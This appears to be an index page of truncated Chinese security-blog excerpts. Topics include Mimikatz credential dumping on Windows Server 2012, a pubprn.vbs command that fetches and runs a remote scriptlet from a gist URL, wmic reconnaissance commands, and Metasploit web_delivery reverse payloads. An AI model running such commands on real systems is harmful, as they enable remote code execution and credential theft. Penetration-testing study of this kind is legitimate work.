网络相关 通用 urllib - 网络库(标准库) requests - 网络库 grab - 网络库(基于pycurl) pycurl - 网络库 (与libcurl绑定) urllib3 - 具有线程安全连接池、文件psot支持、高可用的Python HTTP库 ...

最近做测试的时候发现，windows server2012 使用Mimikatz是直接抓不到明文密码的，而且，直接创建的账号登陆有时会碰到这个问题： ps：2012抓明文需要HKLM:\SYSTEM\CurrentControlSet\Control\S...

       白帽子的前世今生 2001年，当时热闹的是“黑客”和“红客”之分，具备鲜明的政治色彩。打击米国帝国主义的就是红客，让五星红旗飘扬在异国的网站上为最佳实践，把国内网站改成美女图...

远程执行sct的另一种姿势 cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e...

使用wmic识别安装到系统中的补丁情况 1 C:> wmic qfe get description,installedOn 识别正在运行的服务 1 2 C:>sc query type= service C:>net start 识别开机启动的程序，包括路径 1 ...

1、在 GitHub 上编辑代码 我要先说一个很多人都知道的事儿。 当你使用 GitHub看一些文件时（任何的文本文件或者仓库），能看到一个顶部右侧有一个小铅笔图标。点击即可编辑文档。完成后，按照提...

写在前面的话 在此之前，很多朋友都曾通过电子邮件在我直播的时候问过我有关漏洞挖掘方面的问题，而且很多时候不同的人问的都是相同的问题。因此，我决定写一篇文章来回答一下朋友们问得最多的...

简介 最近在逛码云时候发现permeat靶场系统,感觉界面和业务场景设计的还不错.所以过来分享一下. 同时也是分享一下我平时挖掘漏洞的一些思路吧,这篇文章里虽然只简单介绍其中三种漏洞类型，但也...

之前碰到的问题，自己的主机做了DMZ，设置[b]web_delivery[/b]时，发现将lhost设置成外网ip，则脚本不能运行，如果设置成内网ip，则反弹payload反弹的地址为内网地址，即不可能获取到会话，查看...

一、前期阶段 1、了解什么是黑客，每种技能都有其精神所在，没有信仰是绝对不行的。 2、黑客必备的一些基础命令，包括DOS命令，以及UNIX / Linux下的命令。 3、远程扫描、远程刺探技术。包括通...

进攻即是最好的防御，这句话同样适用于信息安全的世界。这里罗列了16个合法的来练习黑客技术的网站，不管你是一名开发人员、安全工程师、代码审计师、渗透 测试人员，通过不断的练习才能让你成...